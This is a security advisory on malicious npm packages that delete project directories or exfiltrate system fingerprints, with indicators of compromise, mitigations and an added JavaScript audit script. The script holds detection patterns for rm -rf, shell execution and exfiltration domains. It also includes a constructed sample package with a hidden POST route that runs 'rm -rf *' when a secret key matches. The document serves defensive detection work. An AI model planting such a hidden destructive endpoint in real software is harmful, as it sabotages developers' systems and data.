
Two malicious npm packages, disguised as legitimate utilities, have been identified executing destructive actions against developer environments. The packages express-api-sync and system-health-sync-api were downloaded approximately 1,000 times before being removed from the registry, according to security researchers [1].
Package Analysis and Malicious Behavior
The express-api-sync package contained hidden functionality that triggered a file deletion command (rm -rf *) through a concealed POST endpoint. The endpoint required a specific secret key (DEFAULT_123) to activate the destructive payload [1]. The second package, system-health-sync-api, exhibited more sophisticated behavior: it ran on both Linux and Windows and included data exfiltration capabilities, collecting system fingerprints and transmitting them to the email address [email protected] [1].
Security analysts note that the packages followed a consistent pattern of appearing legitimate while containing destructive payloads. The lack of financial motivation in these attacks suggests possible state-linked sabotage attempts rather than traditional cybercrime operations [1].
Broader Supply Chain Threats
This incident coincides with reports of a separate npm supply chain attack affecting the Gluestack ecosystem. Sixteen compromised packages, including react-native-aria/focus and gluestack-ui/utils, were found to contain obfuscated remote access trojans (RATs) in their lib/index.js files [2]. These packages collectively accounted for over 960,000 weekly downloads before detection.
The Gluestack attack payloads demonstrated advanced capabilities including file exfiltration and Windows PATH hijacking through fake Python paths. Researchers observed similarities to prior campaigns like biatec-avm-gas-station, suggesting possible connections to known threat actors [2].
Technical Indicators and Detection
Security teams should monitor for these specific indicators of compromise:
| Package | Malicious Behavior | IOCs |
|---|---|---|
| express-api-sync | File deletion via POST endpoint | Secret key: DEFAULT_123 |
| system-health-sync-api | System fingerprinting & data exfiltration | Email: [email protected] |
Additional suspicious npm packages recently identified include ethers-provider2, which injected malicious code into local ethers installations to create persistent reverse shells [3], and PayPal-targeting packages like oauth2-paypal that stole system data through preinstall hooks [4].
Mitigation and Best Practices
Organizations should implement these protective measures:
- Conduct immediate audits of npm dependencies using tools like Socket.dev
- Review all installed packages for unexpected POST endpoints or data collection
- Monitor network traffic for connections to suspicious domains, including *.workers.dev
- Implement strict package approval processes before installation
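As an added illustration of the dependency-review measures above (example code written for this page, not a tool from the article or any vendor), the script below runs a heuristic audit over a package's parsed package.json and source files and reports the patterns the article describes: known malicious names, install-time lifecycle hooks, shell execution, the rm -rf * payload, the DEFAULT_123 trigger key, unexpected POST routes, *.workers.dev references and email literals. The two sample packages, their names and the route path are constructed for the demonstration.

```javascript
// Added example (not from the article or any vendor tool): a heuristic audit pass over
// npm package manifests and source files, flagging the patterns the article describes.
// Names in KNOWN_BAD and the DEFAULT_123 key come from the article; the sample packages
// below are constructed and their names and routes are hypothetical.
const KNOWN_BAD = new Set([
  'express-api-sync', 'system-health-sync-api', 'ethers-provider2', 'oauth2-paypal',
]);
const SOURCE_RULES = [
  { id: 'destructive-shell', re: /rm\s+-rf\s+\*/ },          // express-api-sync payload
  { id: 'shell-exec', re: /child_process|execSync\(|spawn\(/ },
  { id: 'hardcoded-secret', re: /DEFAULT_123/ },              // trigger key for that payload
  { id: 'http-post-endpoint', re: /\.post\s*\(\s*['"`]\// }, // a utility opening a POST route
  { id: 'exfil-domain', re: /\.workers\.dev/ },               // domain pattern from the article
  { id: 'email-literal', re: /[\w.+-]+@[\w-]+\.[\w.-]+/ },    // fingerprints mailed out
];
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare']; // run code at install time

// pkg = { manifest: <parsed package.json>, files: { [relative path]: source text } }
function auditPackage(pkg) {
  const findings = [];
  if (KNOWN_BAD.has(pkg.manifest.name)) findings.push({ rule: 'known-malicious-name', where: 'package.json' });
  const scripts = pkg.manifest.scripts || {};
  for (const hook of INSTALL_HOOKS) {
    if (scripts[hook]) findings.push({ rule: `install-hook:${hook}`, where: 'package.json' });
  }
  for (const [file, src] of Object.entries(pkg.files)) {
    for (const { id, re } of SOURCE_RULES) {
      if (re.test(src)) findings.push({ rule: id, where: file });
    }
  }
  return findings;
}

// Constructed sample mimicking the express-api-sync behaviour described in the article.
const SUSPECT = {
  manifest: { name: 'api-sync-helper', version: '1.0.0', scripts: { postinstall: 'node setup.js' } },
  files: { 'index.js': [
    "const { execSync } = require('child_process');",
    "module.exports = (app) => app.post('/api/example-route', (req, res) => {",
    "  if (req.body.key === 'DEFAULT_123') execSync('rm -rf *');",
    '  res.end();',
    '});',
  ].join('\n') },
};
// Constructed benign utility for comparison.
const BENIGN = { manifest: { name: 'pad-helper', version: '1.0.0' },
                 files: { 'index.js': 'module.exports = (s, n) => s.padStart(n);' } };
console.log('suspect:', auditPackage(SUSPECT).map((f) => f.rule));
console.log('benign:', auditPackage(BENIGN).map((f) => f.rule));
```

To audit an installed tree, feed each node_modules entry's package.json and its JavaScript files into auditPackage and review every finding by hand; the rules are heuristics and will flag legitimate packages that legitimately shell out or register routes.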
The discovery of these malicious packages highlights the growing sophistication of supply chain attacks targeting development environments. Security teams must maintain vigilance against seemingly legitimate packages that may contain hidden destructive capabilities.
References
1. “Malicious npm Packages Posing as Utilities Delete Project Directories”, BleepingComputer, June 7, 2025.
2. “Supply Chain Attack Hits Gluestack npm Packages with 960K Weekly Downloads”, BleepingComputer, June 7, 2025.
3. “Malicious npm ‘Patch’ Delivers Reverse Shell”, ReversingLabs.
4. “Malicious npm Packages Targeting PayPal Users”, FortiGuard Labs.
5. “Fake npm Utilities Remotely Delete Entire App Directories”, SC Media.
6. “Malicious PyPI, npm and Ruby Packages”, The Hacker News, June 2025.